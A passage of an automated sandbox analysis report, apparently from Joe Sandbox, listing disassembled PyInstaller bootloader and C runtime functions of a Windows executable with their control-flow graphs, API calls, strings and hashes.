                                                                                                                        • Instruction ID: aba20efd9a8ee31b21ba1a2660d9be1ba4eeee764f58ef9da0fa5fef49aef49d
                                                                                                                        • Opcode Fuzzy Hash: 818e29d337d92c80142cd965dc47d4137e35c853672c1fb6e5a7bce6e7f526a1
                                                                                                                        • Instruction Fuzzy Hash: 10413432A1978281DA14EB60EC652ABF364FB98764F910335E5AD436E9DF7CD0448B50
                                                                                                                        Function 00007FF7A6731000 Relevance: 12.5, APIs: 1, Strings: 6, Instructions: 273COMMON
                                                                                                                        Download Yara Rule

                                                                                                                        Control-flow Graph

                                                                                                                        • Executed
                                                                                                                        • Not Executed
                                                                                                                        control_flow_graph 383 7ff7a6731000-7ff7a6733686 call 7ff7a673f080 call 7ff7a673f078 call 7ff7a6737600 call 7ff7a673f078 call 7ff7a673adb0 call 7ff7a6744270 call 7ff7a6744f14 call 7ff7a6731af0 401 7ff7a673379a 383->401 402 7ff7a673368c-7ff7a673369b call 7ff7a6733ba0 383->402 403 7ff7a673379f-7ff7a67337bf call 7ff7a673ad80 401->403 402->401 408 7ff7a67336a1-7ff7a67336b4 call 7ff7a6733a70 402->408 408->401 411 7ff7a67336ba-7ff7a67336cd call 7ff7a6733b20 408->411 411->401 414 7ff7a67336d3-7ff7a67336fa call 7ff7a6736990 411->414 417 7ff7a673373c-7ff7a6733764 call 7ff7a6736f90 call 7ff7a67319d0 414->417 418 7ff7a67336fc-7ff7a673370b call 7ff7a6736990 414->418 428 7ff7a673376a-7ff7a6733780 call 7ff7a67319d0 417->428 429 7ff7a673384d-7ff7a673385e 417->429 418->417 424 7ff7a673370d-7ff7a6733713 418->424 426 7ff7a673371f-7ff7a6733739 call 7ff7a674409c call 7ff7a6736f90 424->426 427 7ff7a6733715-7ff7a673371d 424->427 426->417 427->426 440 7ff7a6733782-7ff7a6733795 call 7ff7a6732770 428->440 441 7ff7a67337c0-7ff7a67337c3 428->441 433 7ff7a6733860-7ff7a673386a call 7ff7a6733280 429->433 434 7ff7a6733873-7ff7a673388b call 7ff7a6737a30 429->434 448 7ff7a67338ab-7ff7a67338b8 call 7ff7a6735e40 433->448 449 7ff7a673386c 433->449 444 7ff7a673388d-7ff7a6733899 call 7ff7a6732770 434->444 445 7ff7a673389e-7ff7a67338a5 SetDllDirectoryW 434->445 440->401 441->429 447 7ff7a67337c9-7ff7a67337e0 call 7ff7a6733cb0 441->447 444->401 445->448 456 7ff7a67337e7-7ff7a6733813 call 7ff7a6737200 447->456 457 7ff7a67337e2-7ff7a67337e5 447->457 458 7ff7a67338ba-7ff7a67338ca call 7ff7a6735ae0 448->458 459 7ff7a6733906-7ff7a673390b call 7ff7a6735dc0 448->459 449->434 468 7ff7a673383d-7ff7a673384b 456->468 469 7ff7a6733815-7ff7a673381d call 7ff7a673f2ac 456->469 460 7ff7a6733822-7ff7a6733838 call 7ff7a6732770 457->460 458->459 473 7ff7a67338cc-7ff7a67338db call 7ff7a6735640 458->473 466 7ff7a6733910-7ff7a6733913 459->466 460->401 471 7ff7a6733919-7ff7a6733926 466->471 472 7ff7a67339c6-7ff7a67339d5 call 7ff7a6733110 466->472 468->433 469->460 476 7ff7a6733930-7ff7a673393a 471->476 472->401 485 7ff7a67339db-7ff7a6733a12 call 7ff7a6736f20 call 7ff7a6736990 call 7ff7a67353e0 472->485 483 7ff7a67338dd-7ff7a67338e9 call 7ff7a67355d0 473->483 484 7ff7a67338fc-7ff7a6733901 call 7ff7a6735890 473->484 480 7ff7a673393c-7ff7a6733941 476->480 481 7ff7a6733943-7ff7a6733945 476->481 480->476 480->481 486 7ff7a6733947-7ff7a673396a call 7ff7a6731b30 481->486 487 7ff7a6733991-7ff7a67339c1 call 7ff7a6733270 call 7ff7a67330b0 call 7ff7a6733260 call 7ff7a6735890 call 7ff7a6735dc0 481->487 483->484 498 7ff7a67338eb-7ff7a67338fa call 7ff7a6735c90 483->498 484->459 485->401 510 7ff7a6733a18-7ff7a6733a4d call 7ff7a6733270 call 7ff7a6736fd0 call 7ff7a6735890 call 7ff7a6735dc0 485->510 486->401 497 7ff7a6733970-7ff7a673397b 486->497 487->403 501 7ff7a6733980-7ff7a673398f 497->501 498->466 501->487 501->501 523 7ff7a6733a57-7ff7a6733a5a call 7ff7a6731ab0 510->523 524 7ff7a6733a4f-7ff7a6733a52 call 7ff7a6736c90 510->524 527 7ff7a6733a5f-7ff7a6733a61 523->527 524->523 527->403
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00007FF7A6733BA0: GetModuleFileNameW.KERNEL32(?,00007FF7A6733699), ref: 00007FF7A6733BD1
                                                                                                                        • SetDllDirectoryW.KERNEL32 ref: 00007FF7A67338A5
                                                                                                                          • Part of subcall function 00007FF7A6736990: GetEnvironmentVariableW.KERNEL32(00007FF7A67336E7), ref: 00007FF7A67369CA
                                                                                                                          • Part of subcall function 00007FF7A6736990: ExpandEnvironmentStringsW.KERNEL32 ref: 00007FF7A67369E7
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1740404612.00007FF7A6731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7A6730000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1740360080.00007FF7A6730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1740472247.00007FF7A675A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1740520704.00007FF7A676D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1740520704.00007FF7A677C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1740591717.00007FF7A677E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_7ff7a6730000_T1#U52a9#U624b1.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Environment$DirectoryExpandFileModuleNameStringsVariable
                                                                                                                        • String ID: Cannot open PyInstaller archive from executable (%s) or external archive (%s)$Cannot side-load external archive %s (code %d)!$Failed to convert DLL search path!$MEI$_MEIPASS2$_PYI_ONEDIR_MODE
                                                                                                                        • API String ID: 2344891160-3602715111
                                                                                                                        • Opcode ID: 50111eb3a4ecf2aa9f2e8277530249e951fb5dfdc06a0922ff57c1695f9e45b2
                                                                                                                        • Instruction ID: 9eb20b3bf3a7c9a23ef7ac6b142d11b2463a19175ced19b6f49c20c246a9542e
                                                                                                                        • Opcode Fuzzy Hash: 50111eb3a4ecf2aa9f2e8277530249e951fb5dfdc06a0922ff57c1695f9e45b2
                                                                                                                        • Instruction Fuzzy Hash: 7BB1A811A3E68381FA28BB219D751FF9350BF48F94FC21135EA4D476BAEE2CE5058760
                                                                                                                        Function 00007FF7A6731050 Relevance: 12.4, APIs: 1, Strings: 6, Instructions: 156COMMON
                                                                                                                        Download Yara Rule

                                                                                                                        Control-flow Graph

                                                                                                                        • Executed
                                                                                                                        • Not Executed
                                                                                                                        control_flow_graph 528 7ff7a6731050-7ff7a67310ab call 7ff7a673a610 531 7ff7a67310ad-7ff7a67310d2 call 7ff7a6732770 528->531 532 7ff7a67310d3-7ff7a67310eb call 7ff7a67440b0 528->532 537 7ff7a6731109-7ff7a6731119 call 7ff7a67440b0 532->537 538 7ff7a67310ed-7ff7a6731104 call 7ff7a67324d0 532->538 544 7ff7a6731137-7ff7a6731147 537->544 545 7ff7a673111b-7ff7a6731132 call 7ff7a67324d0 537->545 543 7ff7a673126c-7ff7a6731281 call 7ff7a673a2f0 call 7ff7a674409c * 2 538->543 560 7ff7a6731286-7ff7a67312a0 543->560 547 7ff7a6731150-7ff7a6731175 call 7ff7a673f5fc 544->547 545->543 554 7ff7a673125e 547->554 555 7ff7a673117b-7ff7a6731185 call 7ff7a673f370 547->555 557 7ff7a6731264 554->557 555->554 562 7ff7a673118b-7ff7a6731197 555->562 557->543 563 7ff7a67311a0-7ff7a67311c8 call 7ff7a6738a60 562->563 566 7ff7a67311ca-7ff7a67311cd 563->566 567 7ff7a6731241-7ff7a673125c call 7ff7a6732770 563->567 568 7ff7a673123c 566->568 569 7ff7a67311cf-7ff7a67311d9 566->569 567->557 568->567 571 7ff7a67311db-7ff7a67311e8 call 7ff7a673fd3c 569->571 572 7ff7a6731203-7ff7a6731206 569->572 578 7ff7a67311ed-7ff7a67311f0 571->578 575 7ff7a6731219-7ff7a673121e 572->575 576 7ff7a6731208-7ff7a6731216 call 7ff7a673bb60 572->576 575->563 577 7ff7a6731220-7ff7a6731223 575->577 576->575 580 7ff7a6731237-7ff7a673123a 577->580 581 7ff7a6731225-7ff7a6731228 577->581 582 7ff7a67311fe-7ff7a6731201 578->582 583 7ff7a67311f2-7ff7a67311fc call 7ff7a673f370 578->583 580->557 581->567 585 7ff7a673122a-7ff7a6731232 581->585 582->567 583->575 583->582 585->547
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1740404612.00007FF7A6731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7A6730000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1740360080.00007FF7A6730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1740472247.00007FF7A675A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1740520704.00007FF7A676D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1740520704.00007FF7A677C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1740591717.00007FF7A677E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_7ff7a6730000_T1#U52a9#U624b1.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Message
                                                                                                                        • String ID: 1.2.13$Failed to extract %s: decompression resulted in return code %d!$Failed to extract %s: failed to allocate temporary input buffer!$Failed to extract %s: failed to allocate temporary output buffer!$Failed to extract %s: inflateInit() failed with return code %d!$malloc
                                                                                                                        • API String ID: 2030045667-1655038675
                                                                                                                        • Opcode ID: 2f46febe429223a823cb0d88def6e2cd0a3a4a90dbb08f42ff036ba8ee2fdb2c
                                                                                                                        • Instruction ID: bcc562503472fdcaaec9a9e1b0991e26ba5c198dd9fa88678a337bd1eaad9934
                                                                                                                        • Opcode Fuzzy Hash: 2f46febe429223a823cb0d88def6e2cd0a3a4a90dbb08f42ff036ba8ee2fdb2c
                                                                                                                        • Instruction Fuzzy Hash: A151E622B2A64281E624FB55AC603BBB390FB49F94F864131DE4D437A9EF3CE444C710
                                                                                                                        Function 00007FF7A674DDB8 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 117libraryloaderCOMMONLIBRARYCODE
                                                                                                                        Download Yara Rule

                                                                                                                        Control-flow Graph

                                                                                                                        APIs
                                                                                                                        • FreeLibrary.KERNEL32(?,00000000,?,00007FF7A674E152,?,?,-00000018,00007FF7A674A223,?,?,?,00007FF7A674A11A,?,?,?,00007FF7A6745472), ref: 00007FF7A674DF34
                                                                                                                        • GetProcAddress.KERNEL32(?,00000000,?,00007FF7A674E152,?,?,-00000018,00007FF7A674A223,?,?,?,00007FF7A674A11A,?,?,?,00007FF7A6745472), ref: 00007FF7A674DF40
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1740404612.00007FF7A6731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7A6730000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1740360080.00007FF7A6730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1740472247.00007FF7A675A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1740520704.00007FF7A676D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1740520704.00007FF7A677C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1740591717.00007FF7A677E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_7ff7a6730000_T1#U52a9#U624b1.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: AddressFreeLibraryProc
                                                                                                                        • String ID: api-ms-$ext-ms-
                                                                                                                        • API String ID: 3013587201-537541572
                                                                                                                        • Opcode ID: 01869d8b0b1ae08ce046380e8c955ca032c286979885a37836ee5a28d8bde6d1
                                                                                                                        • Instruction ID: 3346277ac3208dfb49394f40a9b8b44028532a1f97e6c12806a682e8c15bef82
                                                                                                                        • Opcode Fuzzy Hash: 01869d8b0b1ae08ce046380e8c955ca032c286979885a37836ee5a28d8bde6d1
                                                                                                                        • Instruction Fuzzy Hash: F441E121B3B62281FA56EB169C68577E391BF1CF90F8A4135DD5D477A8EE3CE8058220
                                                                                                                        Function 00007FF7A674AF2C Relevance: 10.8, APIs: 7, Instructions: 290COMMONLIBRARYCODE
                                                                                                                        Download Yara Rule

                                                                                                                        Control-flow Graph

                                                                                                                        • Executed
                                                                                                                        • Not Executed
                                                                                                                        control_flow_graph 686 7ff7a674af2c-7ff7a674af52 687 7ff7a674af6d-7ff7a674af71 686->687 688 7ff7a674af54-7ff7a674af68 call 7ff7a6744424 call 7ff7a6744444 686->688 689 7ff7a674b347-7ff7a674b353 call 7ff7a6744424 call 7ff7a6744444 687->689 690 7ff7a674af77-7ff7a674af7e 687->690 702 7ff7a674b35e 688->702 709 7ff7a674b359 call 7ff7a6749db0 689->709 690->689 692 7ff7a674af84-7ff7a674afb2 690->692 692->689 695 7ff7a674afb8-7ff7a674afbf 692->695 698 7ff7a674afd8-7ff7a674afdb 695->698 699 7ff7a674afc1-7ff7a674afd3 call 7ff7a6744424 call 7ff7a6744444 695->699 705 7ff7a674b343-7ff7a674b345 698->705 706 7ff7a674afe1-7ff7a674afe7 698->706 699->709 707 7ff7a674b361-7ff7a674b378 702->707 705->707 706->705 710 7ff7a674afed-7ff7a674aff0 706->710 709->702 710->699 713 7ff7a674aff2-7ff7a674b017 710->713 715 7ff7a674b019-7ff7a674b01b 713->715 716 7ff7a674b04a-7ff7a674b051 713->716 719 7ff7a674b01d-7ff7a674b024 715->719 720 7ff7a674b042-7ff7a674b048 715->720 717 7ff7a674b053-7ff7a674b07b call 7ff7a674cacc call 7ff7a6749e18 * 2 716->717 718 7ff7a674b026-7ff7a674b03d call 7ff7a6744424 call 7ff7a6744444 call 7ff7a6749db0 716->718 751 7ff7a674b07d-7ff7a674b093 call 7ff7a6744444 call 7ff7a6744424 717->751 752 7ff7a674b098-7ff7a674b0c3 call 7ff7a674b754 717->752 748 7ff7a674b1d0 718->748 719->718 719->720 722 7ff7a674b0c8-7ff7a674b0df 720->722 725 7ff7a674b15a-7ff7a674b164 call 7ff7a6752a3c 722->725 726 7ff7a674b0e1-7ff7a674b0e9 722->726 737 7ff7a674b1ee 725->737 738 7ff7a674b16a-7ff7a674b17f 725->738 726->725 730 7ff7a674b0eb-7ff7a674b0ed 726->730 730->725 734 7ff7a674b0ef-7ff7a674b105 730->734 734->725 739 7ff7a674b107-7ff7a674b113 734->739 741 7ff7a674b1f3-7ff7a674b213 ReadFile 737->741 738->737 743 7ff7a674b181-7ff7a674b193 GetConsoleMode 738->743 739->725 744 7ff7a674b115-7ff7a674b117 739->744 746 7ff7a674b30d-7ff7a674b316 GetLastError 741->746 747 7ff7a674b219-7ff7a674b221 741->747 743->737 749 7ff7a674b195-7ff7a674b19d 743->749 744->725 750 7ff7a674b119-7ff7a674b131 744->750 757 7ff7a674b318-7ff7a674b32e call 7ff7a6744444 call 7ff7a6744424 746->757 758 7ff7a674b333-7ff7a674b336 746->758 747->746 754 7ff7a674b227 747->754 759 7ff7a674b1d3-7ff7a674b1dd call 7ff7a6749e18 748->759 749->741 756 7ff7a674b19f-7ff7a674b1c1 ReadConsoleW 749->756 750->725 760 7ff7a674b133-7ff7a674b13f 750->760 751->748 752->722 764 7ff7a674b22e-7ff7a674b243 754->764 766 7ff7a674b1c3 GetLastError 756->766 767 7ff7a674b1e2-7ff7a674b1ec 756->767 757->748 761 7ff7a674b33c-7ff7a674b33e 758->761 762 7ff7a674b1c9-7ff7a674b1cb call 7ff7a67443b8 758->762 759->707 760->725 770 7ff7a674b141-7ff7a674b143 760->770 761->759 762->748 764->759 773 7ff7a674b245-7ff7a674b250 764->773 766->762 767->764 770->725 771 7ff7a674b145-7ff7a674b155 770->771 771->725 778 7ff7a674b277-7ff7a674b27f 773->778 779 7ff7a674b252-7ff7a674b26b call 7ff7a674ab44 773->779 782 7ff7a674b2fb-7ff7a674b308 call 7ff7a674a984 778->782 783 7ff7a674b281-7ff7a674b293 778->783 786 7ff7a674b270-7ff7a674b272 779->786 782->786 787 7ff7a674b2ee-7ff7a674b2f6 783->787 788 7ff7a674b295 783->788 786->759 787->759 790 7ff7a674b29a-7ff7a674b2a1 788->790 791 7ff7a674b2dd-7ff7a674b2e8 790->791 792 7ff7a674b2a3-7ff7a674b2a7 790->792 791->787 793 7ff7a674b2a9-7ff7a674b2b0 792->793 794 7ff7a674b2c3 792->794 793->794 796 7ff7a674b2b2-7ff7a674b2b6 793->796 795 7ff7a674b2c9-7ff7a674b2d9 794->795 795->790 798 7ff7a674b2db 795->798 796->794 797 7ff7a674b2b8-7ff7a674b2c1 796->797 797->795 798->787
                                                                                                                        APIs
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1740404612.00007FF7A6731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7A6730000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1740360080.00007FF7A6730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1740472247.00007FF7A675A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1740520704.00007FF7A676D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1740520704.00007FF7A677C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1740591717.00007FF7A677E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_7ff7a6730000_T1#U52a9#U624b1.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: _invalid_parameter_noinfo
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3215553584-0
                                                                                                                        • Opcode ID: 184652ea66a00c646f0d6e367f8fa0d47b8fb75159f9cd0cc9461bb9675fa9ff
                                                                                                                        • Instruction ID: bac083a056765273df7fdac93c4663c145e274c18b3b1b365ac2d59a247ad70b
                                                                                                                        • Opcode Fuzzy Hash: 184652ea66a00c646f0d6e367f8fa0d47b8fb75159f9cd0cc9461bb9675fa9ff
                                                                                                                        • Instruction Fuzzy Hash: D8C1E66292E68681E762AB159C6C2BFA754FB88F80FD74131D94E033B5CE7CE8458720
                                                                                                                        Function 00007FF7A674C430 Relevance: 6.2, APIs: 4, Instructions: 218COMMON
                                                                                                                        Download Yara Rule

                                                                                                                        Control-flow Graph

                                                                                                                        • Executed
                                                                                                                        • Not Executed
                                                                                                                        control_flow_graph 876 7ff7a674c430-7ff7a674c455 877 7ff7a674c45b-7ff7a674c45e 876->877 878 7ff7a674c723 876->878 880 7ff7a674c497-7ff7a674c4c3 877->880 881 7ff7a674c460-7ff7a674c492 call 7ff7a6749ce4 877->881 879 7ff7a674c725-7ff7a674c735 878->879 883 7ff7a674c4ce-7ff7a674c4d4 880->883 884 7ff7a674c4c5-7ff7a674c4cc 880->884 881->879 886 7ff7a674c4e4-7ff7a674c4f9 call 7ff7a6752a3c 883->886 887 7ff7a674c4d6-7ff7a674c4df call 7ff7a674b7f0 883->887 884->881 884->883 891 7ff7a674c613-7ff7a674c61c 886->891 892 7ff7a674c4ff-7ff7a674c508 886->892 887->886 893 7ff7a674c61e-7ff7a674c624 891->893 894 7ff7a674c670-7ff7a674c695 WriteFile 891->894 892->891 895 7ff7a674c50e-7ff7a674c512 892->895 896 7ff7a674c65c-7ff7a674c66e call 7ff7a674bee8 893->896 897 7ff7a674c626-7ff7a674c629 893->897 900 7ff7a674c697-7ff7a674c69d GetLastError 894->900 901 7ff7a674c6a0 894->901 898 7ff7a674c523-7ff7a674c52e 895->898 899 7ff7a674c514-7ff7a674c51c call 7ff7a6743a20 895->899 924 7ff7a674c600-7ff7a674c607 896->924 903 7ff7a674c62b-7ff7a674c62e 897->903 904 7ff7a674c648-7ff7a674c65a call 7ff7a674c108 897->904 906 7ff7a674c53f-7ff7a674c554 GetConsoleMode 898->906 907 7ff7a674c530-7ff7a674c539 898->907 899->898 900->901 902 7ff7a674c6a3 901->902 909 7ff7a674c6a8 902->909 910 7ff7a674c6b4-7ff7a674c6be 903->910 911 7ff7a674c634-7ff7a674c646 call 7ff7a674bfec 903->911 904->924 914 7ff7a674c60c 906->914 915 7ff7a674c55a-7ff7a674c560 906->915 907->891 907->906 917 7ff7a674c6ad 909->917 918 7ff7a674c71c-7ff7a674c721 910->918 919 7ff7a674c6c0-7ff7a674c6c5 910->919 911->924 914->891 922 7ff7a674c5e9-7ff7a674c5fb call 7ff7a674ba70 915->922 923 7ff7a674c566-7ff7a674c569 915->923 917->910 918->879 925 7ff7a674c6c7-7ff7a674c6ca 919->925 926 7ff7a674c6f3-7ff7a674c6fd 919->926 922->924 929 7ff7a674c56b-7ff7a674c56e 923->929 930 7ff7a674c574-7ff7a674c582 923->930 924->909 933 7ff7a674c6cc-7ff7a674c6db 925->933 934 7ff7a674c6e3-7ff7a674c6ee call 7ff7a6744400 925->934 935 7ff7a674c704-7ff7a674c713 926->935 936 7ff7a674c6ff-7ff7a674c702 926->936 929->917 929->930 931 7ff7a674c584 930->931 932 7ff7a674c5e0-7ff7a674c5e4 930->932 937 7ff7a674c588-7ff7a674c59f call 7ff7a6752b08 931->937 932->902 933->934 934->926 935->918 936->878 936->935 942 7ff7a674c5d7-7ff7a674c5dd GetLastError 937->942 943 7ff7a674c5a1-7ff7a674c5ad 937->943 942->932 944 7ff7a674c5cc-7ff7a674c5d3 943->944 945 7ff7a674c5af-7ff7a674c5c1 call 7ff7a6752b08 943->945 944->932 947 7ff7a674c5d5 944->947 945->942 949 7ff7a674c5c3-7ff7a674c5ca 945->949 947->937 949->944
                                                                                                                        APIs
                                                                                                                        • GetConsoleMode.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,?,?,00000000,00000000,00007FF7A674C41B), ref: 00007FF7A674C54C
                                                                                                                        • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,?,?,00000000,00000000,00007FF7A674C41B), ref: 00007FF7A674C5D7
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1740404612.00007FF7A6731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7A6730000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1740360080.00007FF7A6730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1740472247.00007FF7A675A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1740520704.00007FF7A676D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1740520704.00007FF7A677C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1740591717.00007FF7A677E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_7ff7a6730000_T1#U52a9#U624b1.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ConsoleErrorLastMode
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 953036326-0
                                                                                                                        • Opcode ID: f410d9e07cb2d854853af875ff306a0e9c9ee922f70c4cde11a48ef332fbc2ec
                                                                                                                        • Instruction ID: d88a24b7130c49eaae2b98c538a0db14fbce4457b4319cf63bf98770e34f3cb8
                                                                                                                        • Opcode Fuzzy Hash: f410d9e07cb2d854853af875ff306a0e9c9ee922f70c4cde11a48ef332fbc2ec
                                                                                                                        • Instruction Fuzzy Hash: 03911862F2A65185F750EF658C6C2BEABA0FB08F88F965135DE0E536A4DF38D441C720
                                                                                                                        Function 00007FF7A674E8DC Relevance: 6.2, APIs: 4, Instructions: 162COMMON
                                                                                                                        Download Yara Rule

                                                                                                                        Control-flow Graph

                                                                                                                        APIs
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1740404612.00007FF7A6731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7A6730000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1740360080.00007FF7A6730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1740472247.00007FF7A675A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1740520704.00007FF7A676D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1740520704.00007FF7A677C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1740591717.00007FF7A677E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_7ff7a6730000_T1#U52a9#U624b1.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: _get_daylight$_isindst
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 4170891091-0
                                                                                                                        • Opcode ID: d5d13d1c94d14ccfec0c44e7243bbda22246c77cf8c41a11f0b86d98f8b3a05c
                                                                                                                        • Instruction ID: 923bd8fe98d753799b23f9d3ea3aa166a19e444a3991fbd441e3c59eb32ff929
                                                                                                                        • Opcode Fuzzy Hash: d5d13d1c94d14ccfec0c44e7243bbda22246c77cf8c41a11f0b86d98f8b3a05c
                                                                                                                        • Instruction Fuzzy Hash: 00514B72F262114AFB14EF249C6D6BDB7A1BF08B68FD64235ED1D426F4DB38A4418710
                                                                                                                        Function 00007FF7A673B19C Relevance: 6.1, APIs: 4, Instructions: 94COMMON
                                                                                                                        Download Yara Rule

                                                                                                                        Control-flow Graph

                                                                                                                        APIs
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1740404612.00007FF7A6731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7A6730000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1740360080.00007FF7A6730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1740472247.00007FF7A675A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1740520704.00007FF7A676D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1740520704.00007FF7A677C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1740591717.00007FF7A677E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_7ff7a6730000_T1#U52a9#U624b1.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: __scrt_acquire_startup_lock__scrt_dllmain_crt_thread_attach__scrt_get_show_window_mode__scrt_initialize_crt__scrt_release_startup_lock
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1452418845-0
                                                                                                                        • Opcode ID: 90a7fcc3a81af5bf04ad81541e301d7d9fb9f11ea0fdd18d74326f9016f6428e
                                                                                                                        • Instruction ID: cbf9ac28205897491a48cf0797f7186304a3dadf173bcda434de21a7070d6882
                                                                                                                        • Opcode Fuzzy Hash: 90a7fcc3a81af5bf04ad81541e301d7d9fb9f11ea0fdd18d74326f9016f6428e
                                                                                                                        • Instruction Fuzzy Hash: DA318D91E2B10785FA59BB649D353BBA2819FADF84FC70134D91D4B2F3DE2DA4048271
                                                                                                                        Function 00007FF7A6744680 Relevance: 6.1, APIs: 4, Instructions: 90fileCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1740404612.00007FF7A6731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7A6730000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1740360080.00007FF7A6730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1740472247.00007FF7A675A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1740520704.00007FF7A676D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1740520704.00007FF7A677C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1740591717.00007FF7A677E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_7ff7a6730000_T1#U52a9#U624b1.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: CloseCreateFileHandle_invalid_parameter_noinfo
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1279662727-0
